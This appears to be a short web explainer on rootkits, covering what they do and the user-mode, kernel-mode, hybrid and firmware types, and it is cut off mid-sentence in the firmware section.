What is a rootkit?
A rootkit is a collection of programs that can give administrator-level access of a computer to the attackers. The term “rootkit” is derived from two words “root” and “kit”. A rootkit is a set of programs or tools that enables root-level or administrator-level access to a computer and hence the name. Attackers usually install a rootkit to mask the intrusion and continue malicious activities in a stealthy manner, as rootkits are considerably difficult to detect and remove.
Attackers usually first obtain user-level access to a computer using some security vulnerabilities or by hacking weak system credentials, and then they gain administrator privileges by exploiting more vulnerabilities.
What does a rootkit do?
A rootkit can be installed on a system for several purposes:
- It can install spyware to secretly spy on the users and steal sensitive data.
- It can install a keylogger in the system to log keystrokes of a user and steal sensitive credentials.
- It can install a backdoor to give the attackers full access to the system.
- Rootkits can even alter system logs to remain as stealthy as possible and infect other network systems with malware.
What are the different types of rootkits?
There can be several types of rootkits:
User-mode Rootkit
User-mode rootkits get installed on a system and run on a computer with administrative privileges. They can alter security configurations on a system and hide processes, files, system drives, network ports or even system services. It can automatically launch itself at the time of system start. But, as user-mode rootkits do not alter the Operating System kernel, they are less stealthy and easier to detect and remove comparatively.
Kernel-mode Rootkit
Kernel-mode rootkits are extremely stealthy and can be very difficult to detect and remove. They infect a system and change the Operating System kernel, making it untrusted and unable to detect the rootkit.
Hybrid Rootkit
A hybrid rootkit combines user-mode and kernel-mode programs. It is the most common type of rootkit and is widely used by attackers to secretly infect a system.
Firmware Rootkit
Firmware rootkits can hide themselves in system firmware when the system shuts down and reinstall themselves when the system restarts. These types of rootkits are difficult to remove. If a removal program finds the rootkit and removes it without removing it from the firmware, the rootkit reinstalls …
0 Comments